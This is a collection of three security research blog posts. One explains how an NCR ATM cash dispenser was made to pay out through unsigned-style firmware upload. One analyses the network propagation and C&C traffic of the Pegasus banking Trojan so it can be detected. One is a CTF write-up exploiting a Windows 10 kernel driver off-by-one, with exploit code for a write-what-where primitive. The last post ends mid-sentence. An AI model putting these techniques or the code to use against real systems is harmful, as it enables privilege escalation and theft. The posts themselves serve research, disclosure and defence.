Low-level Hacking NCR ATM

Positive Research Center - 10 Srpen, 2018 - 15:00

Image credit: Sascha Kohlmann, CC BY-SA 2.0
Many of the systems that power the modern world are supposed to be beyond the reach of mere mortals. Developers naively assume that these systems will never give up their secrets to attackers and eagle-eyed researchers.

ATMs are a perfect case in point. Thefts with malware of the likes of Cutlet Maker, as well as unpublicized incidents when unknown attackers plugged in their laptop to an ATM and stole cash without leaving any system logs behind, confirm what the security community has long known. There is no such thing as a hack-proof system, merely one that has not been sufficiently tested.

Getting startedEven now, many people think that the only way to rob an ATM involves the brutest of brute force: pulling up in a pickup, attaching a hook, and pushing hard on the gas pedal, before savaging the ATM with a circular saw, crowbar, and welding kit.

But there is another way.

After a brief search on eBay, I obtained the board for a NCR USB S1 Dispenser with firmware. I had two objectives:

  • Bypass the encryption used for commands (such as "dispense banknotes") that are sent by the ATM computer via USB to the dispenser.
  • Bypass the requirement for physical access to the safe in order to complete authentication (which must be performed by toggling the bottom cassette in the safe), which is needed for generating the encryption keys for the commands mentioned above.

FirmwareThe firmware is an ELF file for the NXP ColdFire processor (the Motorola 68040, my favorite CPU!) running on VxWorks v5.5.1.

There are two main sections of interest in the ELF file, .text and .data:

  • The first contains code that loops continuously most of the time (we'll call it the "main firmware") when the dispenser is connected to the system in the upper part of the ATM.
  • The second contains a zlib-compressed bootloader (locally named "USB Secure Bootloader"), which is responsible for uploading firmware and running the main code.

And best of all (for researchers, anyway), is that the debug symbols in the ELF file were all there and easily searchable.

Inner workings of the main firmwareWe can divide the code into four main levels, from top to bottom in the hierarchy:

  1. USB Receive Thread, which accepts USB packets and distributes them to the different services.
  2. Services are the main units of execution. Each service has a particular role and corresponding tasks (classes).
  3. Classes, here, are tasks that can be performed by a particular service using controllers.
  4. Controllers are the workers that validate tasks, perform tasks, and generate result packets.

There was a lot of firmware code, so I decided to start by finding all possible services and only then trying to figure out where tasks are transferred.

Here are the services I found that were responsible for the actions of interest:

1) DispTranService (Dispenser Transaction Service): Handles encrypted commands, generates bundle of banknotes, authenticates, and much more. Sure, the interesting stuff.

2) securityService: After authentication, a session key is generated on the dispenser. When requested by the ATM computer, the session key is sent to it in encrypted form. This key is then used to encrypt all commands designated important by the vendor, such as dispensing cash and banknotes bundle forming.

But then another service, UsbDownloadService, caught my eye. The job of this service is, when the dispenser is connected to the computer and the firmware version on the dispenser doesn't match the version on the computer, switch to the bootloader in order to upload the firmware needed to work (which is stored in the folder with the vendor's software on the computer) with the OS. This service can also give us information about the current firmware version.

Physical authenticationPhysical authentication is in fact implemented extremely well, with the mission of protecting the ATM from unauthorized USB commands. The ATM safe with cash must be open in order to perform either of the following actions:

  • Remove and insert the lower cassette.
  • Toggle the switch on the dispenser main board.

But this all is required only if the access level is set to the maximum. There are a total of three access levels: USB (0), logical (1), and physical (2). The first two are used by firmware developers for debugging and testing. The vendor, of course, strongly urges selecting the third one by default.

The vulnerabilityHere I will describe a critical vulnerability (now fixed by the vendor) that with physical access to the service zone of the ATM but not to the safe zone (such as through a hole drilled in the ATM front panel), allowed the dispenser execute any command – even if the command is "give me cash now!"

I found that UsbDownloadService accepts commands that don't require encryption. That sounds tempting, but shouldn't Secure Bootloader prevent any further mischief, as its name implies?

Spoiler: …it doesn't!

We need to go deeper As mentioned already, the .data section contains compressed bootloader code that didn't initially catch my attention or that of my colleagues.

As long as the bootloader remained a secret, there was no way to answer the question: "How does the software on the computer upload the dispenser’s firmware?" The main firmware did not reveal any clues.

So the bootloader is unpacked and loaded into the IDA at offset 0x100000, from where investigation can start… except there are no debug symbols there!

But after comparing the main firmware with the bootloader code and reading the controller datasheet, I started to get a better idea of what was happening.

Although the process of firmware uploading seemed to be secure, in reality it was not. The trick was just to upload the firmware in the right way :)

Fully understanding this process took a lot of time and dedication (details can be learned from "Blackbox is dead – Long live Blackbox!" at Black Hat USA 2018 in Las Vegas). These efforts included re-soldering NVRAM and copying the backup to it in order to unbrick the controller… and other easy-peasy stuff like that.

Thank you to my colleague Alexey for his patience!

Here is the method for uploading firmware to the dispenser:

1) Generate an RSA key pair and upload the public key to the controller.

2) Write .data and .text from the ELF in sequence to their physical addresses, taken from the section headers:

3) Calculate the SHA-1 checksum for the newly written data, encrypt that value with the private key, and send the result to the controller.

4) Calculate and send the sum of all firmware words that have been written.

At which point, if everything has been calculated and written correctly, the main firmware will boot without a hitch.

Only one restriction was found for the firmware writing process: the version of the "new" firmware cannot be less than the version of the current firmware. But there's nothing to stop you from tinkering with the firmware number in the data that you write yourself.

So my special firmware with anti-security "secret sauce" was uploaded and run successfully!

By now I had a good knowledge of the main firmware, commands used to dispense cash, and more. All that remained was to send (unencrypted) commands, which the dispenser would eagerly obey.

Cash dispensingThis successful result was a worthy intellectual (although not monetary) reward for all the travails of research, such as bricking a real ATM (oops!). My curiosity almost inspired me to try repeating this trick with another major ATM vendor.

Ultimately, a very real ATM began to whirr and spit out very not-real dummy bills (vendors' shiny equivalent of Hollywood prop money). No magic was necessary: just a laptop, brainpower, and a USB cord.

Conclusions"Security through obscurity" is no security at all. Merely keeping code or firmware proprietary will not stop an attacker from finding a way in and taking advantage of vulnerabilities. Curiosity and an initial financial outlay are all that is required.

Just as development is best handled by developers, security should be the job of security professionals. The most productive approach for vendors is to work closely with dedicated security companies, which have teams possessing the necessary experience and qualifications to assess flaws and ensure a proper level of protection on a case-by-case basis.

PostscriptumThe vendor has confirmed the vulnerability (which was also found in the S2 model) and declared it fixed as of the February 2018 patch.

CVE listings:

  • CVE-2017-17668 (NCR S1 Dispenser)
  • CVE-2018-5717 (NCR S2 Dispenser)

AcknowledgementsBefore I had even set to work on the firmware, Dmitry Sklyarov and Mikhail Tsvetkov had already discovered a lot about it (even without having a dispenser board). Their findings were of enormous assistance! And as concerns everything hardware-related, Alexey Stennikov's help was absolutely invaluable.

Author: Vladimir Kononovich, Positive Technologies

Pegasus: analysis of network behavior

Positive Research Center - 30 Červenec, 2018 - 13:19
Source code for Pegasus, a banking Trojan, was recently published online. Although the Carbanak cybercrime gang was referenced in the archive name, researchers at Minerva Labs have shown that Pegasus actually is the handiwork of a different group known as Buhtrap (Ratopak). The archive contains an overview of the Trojan, its source code, description Russian banking procedures, and information on employees at a number of Russian banks.

The architecture of the Pegasus source code is rather interesting. Functionality is split among multiple modules, which are combined into a single binpack at compile time. During compilation, executables are signed with a certificate from the file tric.pfx, which is missing from the archive.

The network behavior of Pegasus is no less curious. After infection, Pegasus tries to spread within the domain and can act as a proxy to move data among systems, with the help of pipes and Mailslot transport. We focused on the unique aspects of the malware's network behavior and quickly added detection signatures to PT Network Attack Discovery. Thanks to this, all users of PT NAD can quickly detect this Trojan and its modifications on their own networks. In this article, I will describe how Pegasus spreads on a network and how copies of Pegasus communicate with each other.

Basic structureOnce on a victim computer, the initial module (InstallerExe) uses process hollowing to inject code into svchost.exe. After the main modules initialize, Pegasus launches several parallel processes:

  1. Domain Replication: Gathers information about the network and tries to spread Pegasus to other Windows systems.
  2. Mailslot Listener: Listens for Mailslot broadcasts, which are used by Pegasus to send stolen credentials. The slot name is generated at compile time.
  3. Pipe Server Listener: Listens to the Windows Pipe with a name derived from the name of the computer. These pipes are used mainly to discover and communicate with other copies of Pegasus on the same network.
  4. Logon Passwords: Tries once every few minutes to dump credentials from memory with the help of a Mimikatz-based module.
  5. Network Connectivity: Responsible for interfacing with the C&C server and periodically exchanging messages.
// start transports which links data with our CB-manager
// start broadcasting creds to other machines

Domain ReplicationThis module is responsible for lateral movement on Windows networks. Movement consists of two steps:

  1. Discovering other machines on the domain.
  2. Trying to replicate Pegasus to those machines.

Discovery of other machines on the domain relies on use of two API calls: NetServerEnum, which requires the Browser service to work, and WNetOpenEnum/WNetEnumResource. All machines discovered on the domain are verified to determine whether they are already infected. Pegasus polls the generated pipe name more than 20 consecutive times once every 200 milliseconds. (We flagged this strange behavior as one of the indicators of Pegasus presence.) If Pegasus does not detect any signs of infection, it proceeds to the next step: replication.

With the help of credentials found on the host, Pegasus tries to log in to the target over the SMB protocol to IPC$ and ADMIN$ shares. If IPC$ is accessible but ADMIN$ is not, Pegasus concludes that the account does not have sufficient rights and marks the credentials as invalid. After obtaining access to the ADMIN$ share, which is an alias for the %windir% folder, the malware tries to determine the machine architecture in order to pick the suitable module to apply.

This process of architecture determination is based on the headers of PE files on the machine in question. Pegasus attempts to read the first 4 kilobytes of notepad.exe in the %windir% folder. One subtle drawback of this method is that on Windows Server 2012, notepad.exe is located at the path %windir%\System32.

Location of notepad.exe on Windows 7:

C:\Users\Administrator>where notepad.exe

Location of notepad.exe on Windows Server 2012:

C:\Users\Administrator>where notepad.exe

If notepad.exe is not found, Pegasus cannot infect the server, even if it has credentials for an account with the necessary rights. So the simple absence of Notepad in %windir% can stop Pegasus from spreading on Windows Server 2012. Using regedit.exe would have been a more surefire way of accomplishing this task.

After determining the architecture of the target server, Pegasus downloads a small (~10 kilobytes) Remote Service Exe (RSE) dropper. The dropper's purpose is to download binpack, which contains the payload modules, via a pipe in cleartext and hand off control to the Shellcode module. The name of the dropper is generated pseudorandomly and consists of 8 to 15 hexadecimal characters. The pseudorandom generator uses the name of the target machine as a seed and ensures that the name will be identical across restarts, in order to avoid littering %windir% with multiple copies.

After a check of the dropper’s integrity and making sure that the dropper has not been deleted by antivirus protection, an attempt is made to run the dropper via the Windows Management Instrumentation (WMI) mechanism. Service Control Manager (SCM) can also be used, but the malware prefers the first method because SCM leaves more traces in Windows logs. Code suggests plans by the creators of Pegasus to implement other replication methods: WSH Remote, PowerShell Remoting, and Task Scheduler. A module for running commands via RDP was under development as well.

As mentioned already, once launched the dropper successfully checks and starts listening to a pipe before handing off control to the payload that arrives.

Since Pegasus code is injected via process hollowing into the svchost.exe process, the victim disk will not retain any copy of the initial module InstallerExe (if infection started with the machine in question) or of the RSE dropper (in the case of replication). If the dropper is still accessible at a known path, Pegasus deletes it as follows:

  1. Overwrites the file contents with random data.
  2. Overwrites the file again, this time with empty data (zeroes).
  3. Renames the file.
  4. Deletes the file.

If infection is successful, Domain Replication begins again.
MailslotWhen Pegasus obtains credentials from another copy of Pegasus or from the mod_LogonPasswords module, the malware starts broadcasting the credentials on the domain. Broadcasting is performed using the Mailslot mechanism, which is based on SMB and allows sending one-way broadcasts of small portions of data to systems on the domain. The slot names are randomly generated. In order for all infected machines on the domain to send and receive data with the same slot name, the pseudorandom name generator is initialized from the variable TARGET_BUILDCHAIN_HASH, which is set in the configuration during build.

Since Mailslot imposes an upper limit on packet size, only one set of credentials is broadcast at a time. Among all available domain credentials, the set of credentials broadcast longest ago (=all other credentials have been broadcasted more recently at least once) is chosen.

Mailslot data is not sent in cleartext, but instead wrapped in three layers of XOR encryption, the keys for which are transmitted together with the data. The first layer is NetMessageEnvelope with an SHA1 integrity check, which is used for all data sent on the local network. The key is contained in 4 bytes in the beginning of the packet, and shifts 5 bits to the right per cycle. Inside is an XOR-encrypted data structure with fields for credentials and their date of addition. The beginning of the structure contains an 8-byte key, but no shifting is applied. After decoding the structure of the credentials, all that remains is to deserialize individual fields from ENC_BUFFER structures such as computer name, domain name, username, and password. These fields are encrypted with an 8-byte key with shifts. A sample Mailslot packet and script for decrypting it are available: script, PCAP.

In the release version of the malware, Mailslot messages are sent at an interval between 20 seconds and 11 minutes.

// some random wait before making next step
DbgPrint("going to sleep");
#ifdef _DEBUG
// debug - 2-5 s
Sleep(rg.rgGetRnd(&rg, 2000, 5000));
// release - 20 - 650 s
//Sleep(rg.rgGetRnd(&rg, 2000, 65000) * 10);
Sleep(rg.rgGetRnd(&rg, 2000, 15000));

Besides providing credentials, Mailslot messages also announce Internet access and help to find other infected computers that have such access. NetMessageEnvelope indicates the type of message inside. Pipes make it possible for Internet-connected computers to communicate with computers that are not connected to the Internet.

PipesPegasus uses pipes for two-way communication and sending large amounts of data. Although the name of each pipe is generated by a pseudorandom generator, it also depends on the machine name and build, which allows the Pegasus client and server to use the same name.

During one-way communication (such as when sending binpack during replication to another computer), data is sent unencrypted. At the beginning of binpack is the structure SHELLCODE_CONTEXT, which is 561 bytes long.

Two-way communication—say, when proxying data between a Pegasus copy with Internet access and a C&C server—makes use of the same NetMessageEnvelope structure with XOR encryption as we already saw with Mailslot. This is possible because the structure enables differentiating different message types based on the id field.

When data is being proxied, a query for data is sent (PMI_SEND_QUERY), the query ID is received, and the status of the query can be checked by its ID (PMI_CHECK_STATUS_QUERY). In most cases, the payload will be yet another Envelope structure, which adds features and another layer of encryption.

These pipes can do more than just help infected machines to communicate. The module mod_KBRI_hd injects cmd.exe processes with code that intercepts MoveFileExW calls and analyzes all copied data, since this is a part of the bank payment mechanism. If the copied file contains payment data of interest to the attackers, a notification is sent to the C&C server. The mod_KBRI module, injected into cmd.exe, communicates with Pegasus on an infected machine via a pipe whose name is not generated, but rather hard-coded:


Module functionality also includes the ability to replace payment information on the fly using a template. Example search patterns are shown in the screenshot.

C&C trafficData exchange with the C&C server is handled by a separate stream that, every few minutes, checks the queue of data chunks from internal processes or other copies of Pegasus and sends them to the server

During initialization of the mod_NetworkConnectivity module, the presence of a network connection is tested in several steps:

1) Detection of proxy server settings and attempt to connect to

  • In the Registry branch \\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
  • Via WPAD (WinHttpGetProxyForUrl call)
  • Via the proxy server configuration for the current user (WinHttpGetIEProxyConfigForCurrentUser call)

2) Verification of connection with Microsoft update servers and data returned from the servers (authrootseq.txt,, rootsupd.exe)

3) Testing of HTTPS connections with one of the following addresses:


Only if all these checks are passed does Pegasus consider an external network to be accessible, after which it announces this fact on the domain via a Mailslot message. For stealth, Pegasus communicates with the C&C server only during working hours (9:00 a.m. to 7:00 p.m. local time).

Data chunks, wrapped in an envelope with checksum, are sent with DES encryption in CRYPT_MODE_CBC/PKCS5_PADDING mode. The encryption key is derived entirely from a variable that is set at compile time, meaning that we can decrypt traffic between Pegasus and the C&C server so long as we know the value of BUILDCHAIN_HASH. In the source code in the archive in question, this variable was equal to 0x7393c9a643eb4a76. A sample packet and script for decrypting the server check-in are available for download: GitHub, PCAP.

This content (in the INNER_ENVELOPE structure) is sent to the C&C server during check-in or together with other data. The beginning of it contains 28 bytes of envelope with a field for the length and SHA1 checksum.

When proxied via pipes between machines, the same data is sent, but wrapped in the NetMessageEnvelope we have already discussed, plus the checksum and XOR encryption.

The C&C operator can send execution commands to Pegasus copies. Messages with commands or other data, such as EID_CREDENTIALS_LIST, can contain their own layers of encryption for fields, as we already saw with broadcasting of stolen credentials.

DetectionOur attention focused on how to detect Pegasus activity on networks. After carefully studying source code and running the malware in a test environment, we were able to create a list of network anomalies and artifacts that clearly indicate the presence of this sophisticated threat.

It would be fair to call Pegasus versatile: it actively uses the SMB protocol to send messages and communicate with other copies. The methods used for replication and C&C interaction are also distinct. Pegasus copies establish a peer-to-peer network on the domain, building a path to the Internet and communicating with C&C servers by means of traffic proxying. Certificate signing of executables and use of Microsoft and Mozilla sites for verifying connection access complicate attempts to detect Pegasus activity and discover infected hosts.

The Pegasus source code is relatively well structured and commented, making it likely that other threat actors will copy or "borrow" code for their own malware.

Many of the mechanisms for remotely running commands and searching for credentials remain unimplemented. Among the developers' unrealized plans was the ability to modify shellcode on the fly during process injection.

We have developed several signatures for PT NAD and the Suricata IDS suitable for detecting Pegasus-specific activity at various stages, within the very first seconds of presence. Public signatures for Suricata are available from our company on GitHub and Twitter, and will automatically be added to Suricata if you use the suricata-update mechanism.

You can view detections with Pegasus signatures in the following screenshot. This view is taken from PT Network Attack Discovery, our product for incident detection and forensic investigation:

In addition, here are some useful indicators of compromise (IoC):



Author: Kirill Shipulin, @attackdetection team, Twitter | Telegram

Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)

j00ru//vx tech blog - 18 Červenec, 2018 - 13:23

During the weekend of 6-8th of July, our CTF team – Dragon Sector – played in an invite-only competition called WCTF, held in Beijing. The other participants were top-tier groups from around the world (e.g. Shellphish, ESPR, LC↯BC or Tokyo Westerns), and the prize pool of the contest was a stunning $100,000 USD. One particularly unique rule of the CTF was that the challenges were prepared by the teams themselves and not the organizers. Each of the 10 teams was obligated to provide two tasks, at least one of which had to run on Windows. This meant that each team could capture a maximum of 18 flags set up by the other teams in the room. In practice, the structure of the contest incentivized submitting extremely difficult and complex challenges. Remote help was allowed, and the scoring system offered first blood bonus points for being the first, second and third team to solve a task. The hacking part of the event was followed by a soft part, where additional points were granted by a jury and the participants for presenting one’s own tasks on stage.

After two days of though competition, we came out as the runner up of the CTF with 6/18 tasks solved, behind the winner – Tokyo Westerns (7/18 tasks):

My contribution to the above result was a flag for the “Searchme” task authored by Eat, Sleep, Pwn, Repeat. It involved the exploitation of an off-by-one buffer overflow of a PagedPool allocation made by a vulnerable kernel driver loaded in Windows 10 64-bit. Shortly after the CTF, the original author (@_niklasb) published the source code of the driver and the corresponding exploit (see niklasb/elgoog on GitHub and discussion on Twitter), which revealed that my solution was partially unintended. Niklas used the off-by-one to corrupt allocation metadata and performed some pool feng-shui to get overlapping pool chunks. On the other hand, I achieved a similar outcome through a data-only attack without touching any pool metadata, which made the overall exploitation process somewhat simpler. I encourage you to closely analyze Niklas’ exploit, and if you’re interested in my approach, follow along.

If you want to jump straight to the exploit code, find it on GitHub.

Initial recon

As a part of the task, we were provided with a 64-bit Windows kernel driver called searchme.sys consuming 14 kB of disk space, and the following description:

<ip> 3389 flag is here: c:\flag.txt, User:ctf, password:ctf

When I connected to the remote host via RDP, I could log in as a regular “ctf” user. The searchme.sys driver was loaded in the system, and the desired C:\flag.txt file was found on disk, but it couldn’t be read from the security context of the current user, as expected:

At this point, it was quite clear that the goal of the challenge was to exploit a kernel-mode vulnerability in searchme.sys to elevate privileges to administrative or system rights, and then read the flag from the protected file. When I loaded the module in IDA Pro, I quickly learned that it registered a device under \Device\Searchme and handled four IOCTLs using the Buffered I/O communication scheme:

  • 0x222000 – allocates an empty object from PagedPool, saves it in a global array and returns its address to the caller,
  • 0x222004 – frees a previously allocated object,
  • 0x222008 – adds a pair of (char[16], uint32) to an existing object,
  • 0x22200C – transforms an existing object of type-0 to type-1 in a one-way, irreversible manner.

As IOCTLs #1 and #2 were trivial, the vulnerability had to lurk somewhere in the implementation of #3 or #4. I briefly reverse-engineered the entire code found in the driver (with the help of Redford and implr) to get a grasp of its functionality, rename symbols and fix data types. It was clear that the driver maintained a hash map associating textual strings with lists of numeric values, and that some type of binary data structure was involved in type-1 objects, but I still didn’t fully understand the underlying purpose of the code (it later turned out to be binary interpolative code). I didn’t observe any obvious vulnerabilities either, but I noticed two suspicious behaviors:

  1. In the handling of 0x222008, the driver wouldn’t allow duplicates within the list of integers associated with a string token. However, it only checked the newly added value against the one at the back of the list. For example, a [1,2,2] list wouldn’t be allowed due to the equal consecutive numbers, but [2,1,2] could be created just fine. This seemed especially odd considering that the list was sorted later on when being processed by another IOCTL, potentially nullifying the whole point of the duplicate detection.
  2. In nested functions called by the 0x22200C handler, the following code construct was found: if (*cur_buf > buf_end) { return 1; }

    Assuming that buf_end was the smallest address beyond the valid buffer, this could indicate an off-by-one error, as the comparison should otherwise use the >= operator.

Since following the leads discussed above could be time consuming, I decided to try an easier route and see if I could trigger any crashes through dumb fuzzing. This would allow me to start my analysis from a known bad state, instead of spending time on searching for memory corruption primitives in the first place.

Fuzzing the driver

In the context of fuzzing, it was convenient that the communication interface of the driver was limited to four simple operations. During the development stage, I created several wrapper functions around DeviceIoControl which were later reused in the actual exploit. The fuzzer was very simple in its core – it infinitely invoked one of the IOCTLs with random, but correctly formatted input arguments (token=["aa","bb"], value=[0..9]).

After enabling Special Pool for searchme.sys and starting the fuzzer, it only took a few seconds to see the following crash in WinDbg:

DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6) N bytes of memory was allocated and more than N bytes are being referenced. This cannot be protected by try-except. When possible, the guilty driver's name (Unicode string) is printed on the bugcheck screen and saved in KiBugCheckDriver. Arguments: Arg1: ffffd9009c68b000, memory referenced Arg2: 0000000000000000, value 0 = read operation, 1 = write operation Arg3: fffff8026b482628, if non-zero, the address which referenced memory. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffff820b43580360 -- (.trap 0xffff820b43580360) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=ffffd9009c68b000 rbx=0000000000000000 rcx=00000000fffffffe rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000000 rip=fffff8026b482628 rsp=ffff820b435804f8 rbp=0000000000000000 r8=ffffd9009c68b000 r9=0000000000000000 r10=00007ffffffeffff r11=ffff820b435804f0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc searchme+0x2628: fffff802`6b482628 0fbe00 movsx eax,byte ptr [rax] ds:ffffd900`9c68b000=??

The crash occurred at searchme+0x2628, which belongs to a bit-writing function – the same that contains the suspicious *cur_buf > buf_end comparison. Further analysis and experiments (e.g. fuzzing without Special Pool) confirmed that the overflow was indeed limited to a single byte.

At that moment, a light bulb went off in my head – I had already seen similar code not so long ago! After a quick check, it turned out to be true; the “searchme” task was in fact a slightly modified and recompiled version of elgoog2 from 34C3 a few months ago. The immediate benefit of the discovery was that the “elgoog” task came with debugging symbols, including structure definitions, function names and so on. After doing a bit more recon, I found this tweet, which lead to this short write-up and an exploit from shiki7 from Tea Deliverers. The unintended type confusion bug was patched in “searchme” so the old exploit no longer worked, but it still provided some valuable insight. Additionally, Niklas’ description of the pool buffer overflow in point (1) reinforced my belief that this was the intended bug to be exploited here.

And so, I spent the next hour or two moving the symbols from “elgoog” to my “searchme” IDA database.

Controlling the overflow

Upon looking into the series of commands sent by the fuzzer to trigger the crash, I learned that the overflow was indeed caused by “compressing” (IOCTL 0x22200C) an object containing a token with duplicate entries. Since I could only write one byte beyond the allocated buffer, it was likely that its value would need to be carefully controlled. Even with the help of debug symbols, I was still unsure what data structure was constructed by the code, and hence – how to precisely control its contents.

To avoid wasting time on an in-depth examination of the algorithm, I shamelessly copy-pasted the interpolative_size and write_interpolative functions (together with their dependencies) from the Hex-Rays decompiler to Visual Studio, and wrote a simple brute-force program around it, to test the overflow byte for various random input lists. The gist of the tool boils down to the following:

// Fill input_buffer with random numbers and sort it. memset(output_buffer, 0xaa, sizeof(output_buffer)); char *buf = output_buffer; write_interpolative(&buf, input_buffer, 1, ARRAYSIZE(input_buffer) - 1); size_t calculated = (interpolative_size(input_buffer, 1, ARRAYSIZE(input_buffer) - 1) + 7) / 8; ptrdiff_t written = buf - output_buffer - 1; if (written > 0 && calculated > 0 && written > calculated) { const char kSearchedByte = 0; if (output_buffer[calculated] == kSearchedByte) { // Print input_buffer. } }

Depending on the desired value, the length of input_buffer and the range of input numbers can be manipulated. For a simple value of 0x00, the desired effect can be achieved with just five numbers in the [0..9] range:

C:\> brute.exe calculated: 4, written: 11, last byte: 0x00 input_buffer = {0, 1, 1, 1, 2} calculated: 1, written: 4, last byte: 0x00 input_buffer = {0, 3, 4, 5, 5} calculated: 1, written: 4, last byte: 0x00 input_buffer = {5, 7, 8, 9, 9} [...]

With the ability to choose the single byte overflowing our allocation, it was time to lift the primitive to a more powerful one.

Data-only pool corruption

Most dynamic allocators used today place metadata in front of the allocated memory chunks, which has historically facilitated a number of generic heap exploitation techniques. On the other hand, it may currently make the exploitation of small overflows difficult, as metadata separates application-specific objects from each other, and it is often subject to extensive integrity checks. It is obligatory to make the following two references here: A Heap of Trouble: Breaking the Linux Kernel SLOB Allocator (Dan Rosenberg, 2012) and The poisoned NUL byte, 2014 edition (Chris Evans and Tavis Ormandy, 2014).

In his intended solution, Niklas also used pool metadata corruption to confuse the kernel pool allocator, and consequently have two distinct objects overlap with each other to achieve a more useful primitive. This is a valid approach, but it requires the exploit writer to be conscious of the inner workings of the allocator, and to precisely set up the pool layout to guarantee reliable exploitation. As a personal preference, I find it easier to attack program-specific objects than internal system structures, so I intuitively started looking for options to solve the challenge this way.

It may be a little known fact that in the Windows kernel, small allocations (fitting into a single memory page) are handled differently than large ones. For somewhat dated but still relevant details, see Kernel Pool Exploitation on Windows 7 (Tarjei Mandt, 2011) and Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool (Alex Ionescu, 2014). In this specific case, we are interested in two properties of large pool chunks:

  • Metadata is stored separately, so allocations start at page-aligned addresses such as 0xffffa803f5892000.
  • The chunks are often adjacent in memory; e.g. two consecutive allocations of size 0x1000 may be mapped to addresses 0xffffa803f5892000 and 0xffffa803f5893000, respectively.

In the vulnerable driver, we can accurately control the size of the overflown chunk up to a size of 0x10000 (16 pages). This is more than enough to allocate two large objects next to each other, and we can even determine the exact pairs of adjacent areas thanks to the fact that the IOCTLs explicitly return the kernel-mode addresses of the created objects. This was successfully confirmed by a simple tool I wrote during the CTF, which created eight 0x2000-byte long indexes and compared their addresses. The output was similar to the following:

C:\>adjacent.exe [+] Source Index: ffffa803f2f79cb0 [1] Adjacent objects: ffffa803f61db000 --> ffffa803f61dd000 [2] Adjacent objects: ffffa803f61dd000 --> ffffa803f61df000 [3] Adjacent objects: ffffa803f61df000 --> ffffa803f61e1000 [4] Adjacent objects: ffffa803f61e1000 --> ffffa803f61e3000 [5] Adjacent objects: ffffa803f61e3000 --> ffffa803f61e5000 [6] Adjacent objects: ffffa803f61e5000 --> ffffa803f61e7000 [7] Adjacent objects: ffffa803f61e7000 --> ffffa803f61e9000

As you can see, all objects were in fact mapped next to each other in a continuous block of 0x10000 bytes. If we subsequently free every other object to create “holes” in the pool, and promptly allocate a new chunk of the same size that gets overflown by the driver, the overflow should overlap with the first byte of the adjacent index object. This is illustrated below:

At this point, we should look at the type of information stored in the first byte of the allocation. As it turns out, it is the least significant byte of a 32-bit integer indicating the type of the object (type 0 – regular, type 1 – compressed). The structure of the regular object is defined as shown below:

struct _inverted_index { /* +0x00 */ int compressed; /* +0x08 */ _ii_token_table *table; };

If the compressed member is non-zero, the layout of the structure is quite different:

struct _compressed_index { /* +0x00 */ int compressed; /* +0x04 */ int size; /* +0x08 */ int offsets[size]; /* +0x?? */ char data[...]; };

Thanks to the fact that the type of the object is either 0x00000000 or 0x00000001, our one-byte overflow enables us to change the type of the object from compressed_index to inverted_index. The type confusion has some handy primitives – in the structures above, we can see that the table pointer at offset 8 overlaps with the items of offsets[0] and offsets[1]. The values in the offsets array are offsets of compressed data relative to the compressed index, and thus they are relatively small. In our testing, they were equal to 0x558 and 0x56C, respectively.

When combined and interpreted as a 64-bit address, these two values form the following pointer: 0x0000056c00000558. It is not a typical address often observed in regular applications, but nevertheless it is a canonical user-mode address that can be mapped by the program using a simple VirtualAlloc call. In other words, the type confusion allows us to redirect a sensitive kernel-mode pointer to user space, and get complete control over the _ii_token_table structure used by the driver.

If we implement the discussed logic in a proof of concept program to change the type of an object from 1 to 0, and then try to add a new (keyword, value) pair to the corrupted index, we should observe the following system crash while searchme.sys tries to dereference memory from 0x0000056c00000558:

SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff8008b981fea, Address of the instruction which caused the bugcheck Arg3: ffff948fa7516c60, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. [...] CONTEXT: ffff948fa7516c60 -- (.cxr 0xffff948fa7516c60) rax=000000009b82a44c rbx=ffffcc8a26af7370 rcx=0000056c00000558 rdx=0000000000000000 rsi=ffffcc8a273fc20c rdi=ffff948fa75177d4 rip=fffff8008b981fea rsp=ffff948fa7517650 rbp=ffffcc8a2876fef0 r8=0000000000000001 r9=0000000000000014 r10=0000000000000000 r11=0000000000000000 r12=ffffcc8a2876fef0 r13=ffffcc8a29470180 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 searchme+0x1fea: fffff800`8b981fea 48f77108 div rax,qword ptr [rcx+8] ds:002b:0000056c`00000560=????????????????

Let’s take a closer look at the capabilities provided by the controlled _ii_token_table structure.

Getting a write-what-where condition

Based on the elgoog symbol files, I recovered the prototypes of the _ii_token_table and related _ii_posting_list structures and wrote them down as the following C definitions:

struct _ii_posting_list { char token[16]; unsigned __int64 size; unsigned __int64 capacity; unsigned int data[1]; }; struct _ii_token_table { unsigned __int64 size; unsigned __int64 capacity; _ii_posting_list *slots[1]; };

In many ways, the above data structure is similar to a std::map<string, std::vector<unsigned int>> construct in C++. When a program requests that a new (token, value) pair is added to the index, the code iterates through the slots array to find the posting list corresponding to the provided token, and once it’s found, the input value is appended to the list with the following expression:[PostingList.size++] = value;

Considering that the token table is under our control, the _ii_posting_list.size field is 64-bit wide, and we know the base address of the fake posting list, this behavior is trivial to convert to an arbitrary write primitive. First, we declare the fake posting list in static memory with a known name (“fake”) and capacity equal to UINT64_MAX:

namespace globals { _ii_posting_list PostingList = { "fake", 0, 0xFFFFFFFFFFFFFFFFLL }; } // namespace globals

Then, we write a function to initialize the fake token table at the special 0x0000056c00000558 address:

BOOLEAN SetupWriteWhatWhere() { CONST PVOID kTablePointer = (PVOID)0x0000056c00000558; CONST PVOID kTableBase = (PVOID)0x0000056c00000000; if (VirtualAlloc(kTableBase, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) == NULL) { printf("[-] Unable to allocate fake base.\n"); return FALSE; } _ii_token_table *TokenTable = (_ii_token_table *)kTablePointer; TokenTable->size = 1; TokenTable->capacity = 1; TokenTable->slots[0] = &globals::PostingList; return TRUE; }

Lastly, we add a helper function to trigger the 4-byte write-what-where condition:

